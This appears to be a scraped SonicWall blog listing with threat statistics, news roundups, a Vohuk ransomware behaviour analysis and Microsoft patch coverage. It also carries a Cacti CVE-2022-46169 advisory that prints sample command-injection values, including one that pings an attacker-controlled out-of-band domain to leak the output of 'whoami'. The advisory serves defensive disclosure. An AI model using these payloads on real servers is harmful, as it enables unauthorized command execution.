Latest Threat Intelligence Tracks Shifting Cyber Frontlines in 2022

/0 Comments/in /by

Few of 2021’s trends escaped 2022 unscathed. Here’s a quick look at the accelerations and reversals detailed in the 2023 SonicWall Cyber Threat Report.

With the pandemic finally relenting in many areas, employees returning to the safety of the perimeter and supply chains beginning to show signs of normalizing, many felt that 2022 would offer cybersecurity a return to the sort of stability that’s been largely absent the past few years.

Instead, we’ve seen the opposite: Cybercriminals have attempted to maximize the number of potential victims while minimizing risk — and this shift in tactics and targets has brought about the demise of years-long trends and begun to give rise to new cybercrime epicenters.

SonicWall Capture Labs threat researchers spent 2022 tracking these changes in real time, and have compiled their findings in the 2023 SonicWall Cyber Threat Report. This exclusive threat intelligence is designed to arm organizations against today’s ever-changing threat environment.

“The past year reinforced the need for cybersecurity in every industry and every facet of business, as threat actors targeted anything and everything, from education to retail to finance,” said SonicWall President and CEO Bob VanKirk. “While organizations face an increasing number of real-world obstacles with macroeconomic pressures and continued geopolitical strife, threat actors are shifting attack strategies at an alarming rate.”

Ransomware

In 2022, SonicWall Capture Labs threat researchers recorded 493.3 million ransomware attempts globally, a decrease of 21% year over year. This was fueled by a massive drop in North America, which typically sees the lion’s share of ransomware: attacks there fell by nearly half.

But while ransomware was down year-over-year, it remains at historic highs — total attack volume in 2022 was higher than in 2017, 2018, 2019 and 2020. These attacks impacted governments, enterprises, hospitals, airlines and schools throughout the year, resulting in economic loss, widespread system downtime, reputational damage and more. Some of these industries saw a significant uptick in ransomware volume, particularly education and finance, which saw spikes of 275% and 41%, respectively.

Malware

After three straight years of decline, malware reversed course in 2022, rising 2% to 5.5 billion. While this is a fairly modest increase, it’s being fueled by double-digit, accelerating growth in cryptojacking and IoT malware, which showed year-over-year increases of 43% and 87%, respectively.

The areas being targeted by malware are also changing rapidly. In 2022, countries that typically see more malware, such as the U.S., the U.K. and Germany, showed year-over-year decreases in attack volume. But Europe as a whole, Latin America and Asia — which all typically see significantly less malware than North America — all recorded significant increases.

IoT Malware

In 2022, SonicWall threat researchers observed 112.3 million IoT malware attempts, representing an 87% year-over-year increase and a new yearly record. While all regions and industries showed an increase in attack volume over 2021, some were hit particularly hard: Triple-digit increases were observed in North America, as well as in the education, retail and finance industries.

Cryptojacking

Cryptojacking attacks breezed past the 100 million mark for the first time in 2022, reaching a new high of 139.3 million. This 43% increase was fueled by a number of new campaigns that surfaced late in the year, pushing December to 30.36 million hits — a new monthly record and a total exceeding most entire quarters. Despite skyrocketing rates, some were fortunate enough to see welcome decreases, such as government and healthcare customers.

Apache Log4j

Another milestone was observed in intrusion attempts against the Apache Log4j ‘Log4Shell’ vulnerability, which passed the 1 billion mark in 2022. Since its discovery in December 2021, this vulnerability has been actively exploited, and the pace of these attempts seems to be accelerating: Every month in 2022 had significantly more attempts than were seen in December 2021, and 15% more hits were observed in Q2 than were seen in Q1.

Cybersecurity News & Trends – 02-24-2023

/0 Comments/in /by

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

We’re nearing the end of February, and SonicWall is still receiving positive press. Cyber Security Intelligence looked to SonicWall for data on higher education. CRN discussed SonicWall’s plans for 2023 and some of the features of the NSa 5700. Utah Pulse discusses our data on healthcare and education.

In industry news, Dark Reading reported on a U.S. military email server being exposed and Google bug bounty programs setting records. Hacker News has the scoop on the spam and phishing attacks at NPM. Bleeping Computer covered Activision’s phishing attack as well as a multi-year breach at GoDaddy.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Cybersecurity Predictions for 2023 – Things You Should Know

Utah Pulse, SonicWall News: SonicWall reports a 328% YoY increase in healthcare ransomware attacks in 2022, and healthcare and education are expected to be among the most targeted sectors in 2023. The expanding IoT footprint in these sectors is predicted to make them more vulnerable to digital attacks, increasing the risk to critical infrastructure.

The 20 Coolest Network Security Companies Of 2023: The Security 100

CRN, SonicWall News: Key offer­ings from SonicWall in the realm of next-gener­ation firewalls include the SonicWall NSa 5700, which utilizes a scalable hardware architecture designed to fit in a single rack-mountable unit. The high port density of the NSa 5700 includes multiple 10-Gigabit Ether­net and 1-Gigabit Ethernet fiber and copper interfaces.

CEO Outlook 2023

CRN, SonicWall News: One of the biggest opportunities we will be tackling with our partners is providing a broader set of unified and cost-effective solutions that fully secure the evolving network perimeter. For many of our partners and customers, 2023 will represent a period of cautious and informed investment in IT and security – customers will demand more bang for their security buck.

Universities Targeted with Ransomware

Cyber Security Intelligence, SonicWall News: According to research carried out by threat analysts at SonicWall there was a 51% increase in ransomware attacks within the education sector in 2022. They predicted the education sector to be among the most targeted by cyber criminals in 2023. This is certainly proving to be true so far.

Ransomware Attacks Aimed at Manufacturing Grew By 50pc in 2022

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Genie Out of The Bottle: ChatGPT Has Shaken Up the AI Sector

SiliconRepublic, SonicWall News: In recent AI predictions for 2023, experts such as Immanuel Chavoya of SonicWall said new software will give threat actors the ability to quickly exploit vulnerabilities and reduce the technical expertise required “down to a five-year-old level.”

Stolen MTU Data Appears on Dark Web Following IT Breach

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of Sonicwall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the dissemination of the news, which on the morning of last Monday (6) competed with football game calendars and the price of cooking gas in Manaus the most sought after Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector
TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

Industry News

Activision Breached Following Phishing Attack

Gaming giant Activision revealed that they were the victim of a data breach in December 2022 exposing employee and game info. According to Bleeping Computer, hackers gained access to their systems by using a phishing SMS that successfully tricked an employee. No source data or player info was exposed in the leak. A research group called VX-Underground claims that sensitive employee information as well the companies release schedule up to November 2023 was stolen in the attack. Insider Gaming reported that the compromised employee was in the human resources department which netted the attackers access to large amounts of sensitive employee data.

Google Bug Bounties Break Records

Last year, Google awarded more than $12 million to ethical hackers and researchers for bug bounties while addressing over 2,900 vulnerabilities in its products. According to Dark Reading, that total eclipses the previous years dollar amount of $8.5 million. Bug bounties in the Android ecosystem alone netted white hats $4.8 million. Google released their annual Vulnerability Reward Program (VRP) report, and it showed multiple segments of their VRP set records in 2022.

U.S. Military Emails Exposed Due to Password Mishap

A cloud-based email server for the Department of Defense spent two weeks without password protection leaving it wide open to the public. A security researcher spotted the server and noticed sensitive information in the emails. According to Dark Reading, the email server appeared to be configured improperly. It’s not known if anyone aside from the security researcher found the exposed data during the two-week period it was unprotected. There was no classified data leaked from the server.

NPM Repository Attacked with Spam and Phishing Links

An attack on the widely used JavaScript package manager NPM has resulted in one of its repositories being flooded with over 15,000 spam packages. The threat actors were attempting to distribute phishing links on the open-source platform. According to Hacker News, the fake packages were attempting to pass off as free goodies. Some of the packages were called things like “free-tiktok-followers,” or “free-xbox-codes.” The attackers used automation to post a large number of packages quickly.

GoDaddy Reveals They Suffered Multi-year Breach

Popular web hosting company GoDaddy has been the victim of a multi-year breach that has resulted in their source code being stolen. GoDaddy says currently unknown attackers placed malware on their servers after infiltrating them. The attack was discovered in December 2022 when some GoDaddy users reported that their domains were now being redirected to random websites. While it was only discovered in December, GoDaddy revealed that the attackers had access to their networks for multiple years. According to Bleeping Computer, the breaches that GoDaddy experienced in November 2021 and March 2020 are related to this multi-year breach. GoDaddy has enlisted the help of external cybersecurity experts and law enforcement to investigate the cause of the incident.

SonicWall Blog

SonicWall Recognizes Bill Conner for Transition of Business, Impact on Cybersecurity Industry – Bret Fitzgerald

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition – Bret Fitzgerald

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

Talking Boundless Cybersecurity at the Schoolscape IT 2022 Conference – Mohamed Abdallah

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

Cacti Command Injection Vulnerability

/in /by

Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Cacti Command Injection Vulnerability | CVE-2022-46169
The command injection vulnerability exists in the remote_agent.php file.

As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling “action” that is defined in the database. In Cacti, users can define actions to monitor a single host or “poller.” One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.

Here are some examples of exploits:


“poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun”  This is attempting to inject a command into the poller_id parameter by appending a command using a semicolon (;) followed by a command to ping a domain that is controlled by the attacker. The command is also using command substitution to execute the whoami command and insert the output into the command being executed. The purpose of this command is to send a ping request to a domain controlled by the attacker that includes the result of the whoami command in the URL, which could be used to identify the username of the user running the Cacti remote agent script.

 

The part of the request touch+%2Ftmp%2FTMSR is an attempt to execute a shell command on the server, which is to create a file named TMSR in the /tmp/ directory using the touch command. This request is malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15808:Cacti remote_agent Command Injection

Cacti has patched this vulnerability.

Threat Graph

Vohuk Ransomware uses Cipher.exe making files recovery impossible

/in /by

Recently, the SonicWall Capture Labs Research team analyzed a ransomware called Vohuk. Which uses the genuine Windows tool Cipher.exe to overwrite the deleted files which make the recovery of the files impossible.

Cipher.exe is a command-line tool that can be used to manage encrypted data by using the Encrypting File System (EFS).Whenever any files or folder is deleted the data is not deleted, only the space on the disk that was occupied by the deleted data is deallocated. Until the space is overwritten, there is a possibility that the deleted data can be recovered using a low-level disk editor or data-recovery software. Administrators uses the Cipher.exe to encrypt and decrypt data on drives that use the NTFS file system. In Encrypting process windows makes a backup copy of the file. So the data isn’t lost if an error occurs during the encryption process. After the encryption is complete, the backup copy is deleted. As with other deleted files, the data isn’t removed until it has been overwritten. So to prevent unauthorized recovery of such data windows has provided the tool called Cipher.exe.

Ransomware uses this feature of Cipher.exe to overwrite the deleted data so as to make the recovery of the files impossible.

Infection Cycle:

At the start of the execution it creates a named mutex “Global\\VohukMutes” to avoid different instance of Vohuk Ransomware running on the same system.

It creates a folder on root drive C:\\ProgramData\\Vohuk at below location and copies itself as App.exe and also creates a Log file which is used for logging it’s activities.

At the start of the Log.txt file it mentions the Name as VohukCrypter V1.51 and its version number.

The Ransomware collects the command-line options if any passed at the time of execution. It checks for the following string options in the command line parameter and depending upon the parameter provided it may change its behaviour.

‘/NOKILL’
‘/NOMOUNT’
‘/NOEMPTY’
‘/LAN’
‘/NOLOCAL’
‘/NONETDRIVE’
‘/NOSTARTUP’
‘/FULL’
‘/FAST’
‘/PATH=’

Ransomware calls the GetSystemInfo API and gets the Number of processor presents on the system

The number of threads created is dependent on the number of processors, with one thread being created for each processor.
If the number of processors are more than 64 then maximum thread created by the Ransomware is 64 threads.

Before encrypting the files it first empties the files present from all Recycle Bins on all drives.

It launches the command prompt process and Vssadmin command is passed to the command prompt to delete the volume shadow copies.

Ransomware kills the below running process if found running on the system. So that it is able to encrypt the files which are currently in use.

It also enumerates the services and kills below listed services and also its dependent services if found running on the system.

The Ransomware use multi-threading by using APIs CreateIoCompletionPort(), PostQueuedCompletionStatus(), GetQueuedCompletionPort() to handle multiple files concurrently and thread priority is also set to high for quick encryption.

Ransomware avoids encrypting the files with below filename.

And it also avoids encrypting the files with below extension; so that the common functioning of the Operating system is not hampered.

Ransomware checks the file attributes before encryption, if the attribute is READ_ONLY then it resets the READ_ONLY attribute.

It encrypts the files, renames them and adds the extension “.Vohuk” and drops a ransom note file named R3ADM3.txt,in each folder.

Once all the encryption process is completed it uses genuine Windows tool Cipher.exe on all drives to overwrite the deleted data.

The ransomware also replaces the desktop wallpaper with its own.

 

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: VohukCrypt.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 02-17-2023

/0 Comments/in /by

Curated cybersecurity news and trends from the industry’s leading bloggers and news outlets, for you from SonicWall.

It’s Valentine’s week, and SonicWall is getting love from media outlets once again. SiliconRepublic talked to our own Spencer Starkey about his predictions for 2023 and quoted Immanuel Chavoya’s thoughts on artificial intelligence.

In industry news, Bleeping Computer has the low-down on Apple and Microsoft’s zero-day issues and has informed us of another zero-day exploit that was used to breach 130 organizations. Dark Reading reported on a former cybersecurity entrepreneur from Russia being convicted of a hack-to-trade scheme. Hacker News warns of a North Korean threat actor targeting South Korean systems as well as a flurry of attacks from the notorious SideWinder group.

Remember to keep your passwords close and your eyes peeled — cybersecurity is everyone’s responsibility.

SonicWall News

Ransomware Attacks Aimed at Manufacturing Grew By 50pc in 2022

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of SonicWall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Genie Out of The Bottle: ChatGPT Has Shaken Up the AI Sector

SiliconRepublic, SonicWall News: In recent AI predictions for 2023, experts such as Immanuel Chavoya of SonicWall said new software will give threat actors the ability to quickly exploit vulnerabilities and reduce the technical expertise required “down to a five-year-old level.”

Stolen MTU Data Appears on Dark Web Following IT Breach

SiliconRepublic, SonicWall News: In recent cybersecurity predictions for 2023, Spencer Starkey of Sonicwall predicted that healthcare and education will be among the sectors most targeted by cyberattacks this year.

Ryuk, Conti Ransomware Members Hit with UK Sanctions in Latest Crackdown

ITPro, SonicWall News: In 2020 – the third year of it being considered a major strain – security firm SonicWall revealed it was behind a third of ransomware attacks worldwide for the year.

Global Hacker Attack May Reach Brazil but Risk Is Limited, Says Experts

GQ Brasil, SonicWall News: Arley Brogiato, director for Latin America and the Caribbean of the multinational security company SonicWall, does not exclude the possibility of these attacks reaching Brazilian companies, but says he is surprised by the alerts and the dissemination of the news, which on the morning of last Monday (6) competed with football game calendars and the price of cooking gas in Manaus the most sought after Google Trends.

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition

SonicWall Blog, SonicWall News: SonicWall Chief Revenue Officer (CRO) Jason Carter and Vice President Americas Channel Sales Matt Brennan have been named to CRN’s 2023 Channel Chiefs list. Every year, CRN honors the IT channel executives who drive the channel success and evangelize the importance of channel partnerships within the IT industry.

Challenges For Startups in The IoT Sector

TechToday, SonicWall News: According to a report by SonicWall, 2.8 billion malware attacks were registered, up 11% in the first half of 2022, marking the first increase in global malware volume in over three years.

JD Sports Cyber Attack: Why Online Retail Is Vulnerable and What Can Be Done?

Charged Retail, SonicWall News: The JD Sports incident is yet another example of the rise in cyberattack incidents, with the retail industry experiencing a 90% increase in ransomware attacks last year, according to a report from SonicWall.

The Best Hardware Firewalls for Small Businesses

Ask by Geeks, SonicWall News: One of the best small business firewalls is the SonicWall TZ400 Security Firewall. The SonicWall TZ400 NGFW Premium is considered a little more expensive than other firewall options, but its security, reliability, ease of use, and unique features justify its price.

10 million Customers Exposed in JD Sports Cyber Attack

ITPro, SonicWall News: A study last year by SonicWall found that the retail sector saw a 264% surge in ransomware attacks between February 2021 and 2022. The widespread consumer shift to online shopping during the pandemic prompted hackers to escalate attacks against online retailers.

Three Ways Governments Can Better Protect Public Data

Networking+, SonicWall News: The chances of being hit by a ransomware attack are more significant than ever. Last year, global ransomware volume skyrocketed by 105% year over year, according to the 2022 SonicWall Cyber Threat Report. While no industry was spared, the numbers were particularly gruesome for governments. Ransomware attempts on government entities rose a staggering 1,885%. That’s more than double the increase reported by healthcare (755%), education (152%), and retail (21%) combined.

2023 Predictions: Emerging Tech & Global Conflict Bring New Cyber Threats

CyberSecurityInsiders, SonicWall News: 2022 saw a shifting cybersecurity landscape as rising geopolitical conflicts brought new tactics, targets, and goals for cybercrime. According to recent threat intelligence from SonicWall, global ransomware attempts declined 31% YoY as cybercriminals and nation-state actors opted for never-before-seen malware variants, IoT malware, and cryptojacking in attacks motivated by financial gain and state-sponsored hacktivism.

Cybersecurity ‘More Critical Than Ever’ In Era of Connected Care: BD

MedTechDive, SonicWall News: Ransomware attacks in which cybercriminals attempt to extort money declined by 23% overall during the first half of 2022 but increased 328% in healthcare, according to data from cybersecurity company SonicWall.

Industry News

SideWinder Group Responsible for Over 60 Attacks According to Researchers

The notorious threat actor group known as SideWinder has been linked to 61 attacks across Sri Lanka, Bhutan, Nepal, Afghanistan and Myanmar. According to Hacker News, the groups targets include government, finance, military and other organizations. Their typical attacks start with a spear-phishing email that includes a bogus URL. The URL directs victims to a site where the main malware is dropped onto their computer. It was also stated that SideWinder has added new tools to its threat arsenal. The ability to reload and retool so frequently suggests that SideWinder has considerable financial backing – perhaps even from a nation-state.

CISA Warns of Zero-days Being Exploited On iOS and Windows

Four new exploits were added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of exploits found in the wild this week. Three of them affected Microsoft products, and Microsoft patched all three on Tuesday as part of their February 2022 patch. The fourth affected WebKit on Apple devices and was acknowledged by Apple on Monday. Apple released emergency security updates to address the issues. According to Bleeping Computer, CISA has now given U.S. federal agencies until March 7th to patch all four exploits.

Clop Ransomware Gang Uses Zero-Day to Breach 130 Organizations

GoAnywhere MFT secure file transfer tool has been exploited for a zero-day vulnerability. The exploit allowed the attackers to execute code remotely on the compromised systems. According to Bleeping Computer, the ransomware gang known as Clop reached out last week to inform BleepingComputer that they had used this vulnerability to breach 130 organizations already. They refused to go into details on whether they had already begun demanding ransoms from their victims or not. Reporter Brian Krebs reported that GoAnywhere MFT had warned of this exploit last week. Fortra, the developer of GoAnywhere MFT, said, “We are working directly with customers to assess their individual potential impact, apply mitigations and restore systems.” The full impact of the breaches is still unknown.

Tesla, Roku Hacker from Russia Faces Decades in Prison

Vladislav Klyushin has been found guilty by a U.S. district court for crimes involving information theft from U.S. networks. Klyushin is a former cybersecurity businessman from Russia. According to a release from the United States Justice Department, Klyushin was arrested in Sion, Switzerland, in 2021 before being sent to the U.S. to stand trial. U.S. attorney Rachael S. Rollins said, “For nearly three years, he and his co-conspirators repeatedly hacked into U.S. computer networks to obtain tomorrow’s headlines today.” Klyushin and his co-conspirators used the stolen information to gain money through insider trading. According to Dark Reading, the charges of security fraud and wire fraud could each put him behind bars for 20 years. Klyushin will face sentencing on May 4th.

North Korean Threat Actor Targeting South Korea with Malware

A threat actor who has been linked to North Korea has been caught targeting South Korea with a new malware. They’re calling the new malware M2RAT, and the threat actor is being tracked as APT37. According to Hacker News, this cybercriminal is also tracked under the monikers ScarCruft, Ricochet Chollima, Red Eyes and Reaper. The new malware was observed in January 2023, and it uses a now-patched vulnerability in the South Korean word processor Hangul. This same vulnerability was exploited in 2017 but the North Korean Lazarus group to target South Korean cryptocurrency exchanges.

SonicWall Blog

SonicWall Recognizes Bill Conner for Transition of Business, Impact on Cybersecurity Industry – Bret Fitzgerald

SonicWall’s Jason Carter and Matt Brennan Earn 2023 CRN Channel Chief Recognition – Bret Fitzgerald

Can You Catch All the Phish? Take Our New Phishing IQ Quiz and Find Out! – Ken Dang

Celebrating 2023 With Expanded “3 & Free” – Matt Brennan

‘3 & Free’ Promotion: How to Upgrade to a New SonicWall TZ Series NGFW for Free – Matt Brennan

The Art of Cyber War: Sun Tzu and Cybersecurity – Ray Wyman

3 & Free: 1 Amazing Deal, 2 Exceptional Firewalls, 3 Years of Superior Threat Protection – Matt Brennan

SonicWall Included on the Acclaimed CRN Edge Computing 100 List for 2022 – Bret Fitzgerald

A New Era of Partnering to Win – Robert (Bob) VanKirk

Multiply Your Security with Multifactor Authentication – Amber Wolff

10 Reasons to Upgrade to the Latest SonicWall Gen 7 TZ Firewall – Sarah Choi

Microsoft Security Bulletin Coverage for February 2023

/in /by

SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of February 2023. A list of issues reported, along with SonicWall coverage information, is as follows:

CVE-2023-21529 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 3520: Microsoft Exchange Server Remote Code Execution (CVE-2023-21529)

CVE-2023-21688 NT OS Kernel Elevation of Privilege Vulnerability
ASPY 403: Malicious-exe exe.MP_297

CVE-2023-21689 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 404: Malicious-exe exe.MP_298

CVE-2023-21690 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 405: Malicious-exe exe.MP_299

CVE-2023-21692 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
ASPY 406: Malicious-exe exe.MP_300

CVE-2023-21706 Microsoft Exchange Server Remote Code Execution Vulnerability
IPS 15834: Microsoft Exchange Server Remote Code Execution (CVE-2023-21706)

CVE-2023-21715 Microsoft Office Security Feature Bypass Vulnerability
ASPY 410: Malformed-File pub.MP.6

CVE-2023-21812 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 409: Malicious-exe exe.MP_303

CVE-2023-21823 Windows Graphics Component Elevation of Privilege Vulnerability
ASPY 408: Malicious-exe exe.MP_302

CVE-2023-23376 Windows Common Log File System Driver Elevation of Privilege Vulnerability
ASPY 407: Malicious-exe exe.MP_301

The following vulnerabilities do not have exploits in the wild :
CVE-2023-21528 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21553 Azure DevOps Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21564 Azure DevOps Server Cross-Site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21566 Visual Studio Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21567 Visual Studio Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21568 Microsoft SQL Server Integration Service (VS extension) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21570 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21571 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21572 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21573 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21684 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21685 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21686 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21687 HTTP.sys Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21691 Microsoft Protected Extensible Authentication Protocol (PEAP) Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21693 Microsoft PostScript Printer Driver Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21694 Windows Fax Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21695 Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21697 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21699 Windows Internet Storage Name Service (iSNS) Server Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21700 Windows iSCSI Discovery Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21701 Microsoft Protected Extensible Authentication Protocol (PEAP) Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21702 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21703 Azure Data Box Gateway Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21704 Microsoft ODBC Driver for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21705 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21707 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21710 Microsoft Exchange Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21713 Microsoft SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21714 Microsoft Office Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-21716 Microsoft Word Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21717 Microsoft SharePoint Server Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21718 Microsoft SQL ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21721 Microsoft OneNote Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21722 .NET Framework Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21777 Azure App Service on Azure Stack Hub Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21778 Microsoft Dynamics Unified Service Desk Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21797 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21798 Microsoft ODBC Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21799 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21800 Windows Installer Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21801 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21802 Windows Media Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21803 Windows iSCSI Discovery Service Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21804 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21805 Windows MSHTML Platform Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21806 Power BI Report Server Spoofing Vulnerability
There are no known exploits in the wild.
CVE-2023-21807 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability
There are no known exploits in the wild.
CVE-2023-21808 .NET and Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21809 Microsoft Defender for Endpoint Security Feature Bypass Vulnerability
There are no known exploits in the wild.
CVE-2023-21811 Windows iSCSI Service Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21813 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21815 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21816 Windows Active Directory Domain Services API Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21817 Windows Kerberos Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-21818 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21819 Windows Secure Channel Denial of Service Vulnerability
There are no known exploits in the wild.
CVE-2023-21820 Windows Distributed File System (DFS) Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-21822 Windows Graphics Component Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23377 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23378 Print 3D Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23379 Microsoft Defender for IoT Elevation of Privilege Vulnerability
There are no known exploits in the wild.
CVE-2023-23381 Visual Studio Remote Code Execution Vulnerability
There are no known exploits in the wild.
CVE-2023-23382 Azure Machine Learning Compute Instance Information Disclosure Vulnerability
There are no known exploits in the wild.
CVE-2023-23390 3D Builder Remote Code Execution Vulnerability
There are no known exploits in the wild.

Microsoft OneNote files are widely used to deliver malware payloads

/in /by

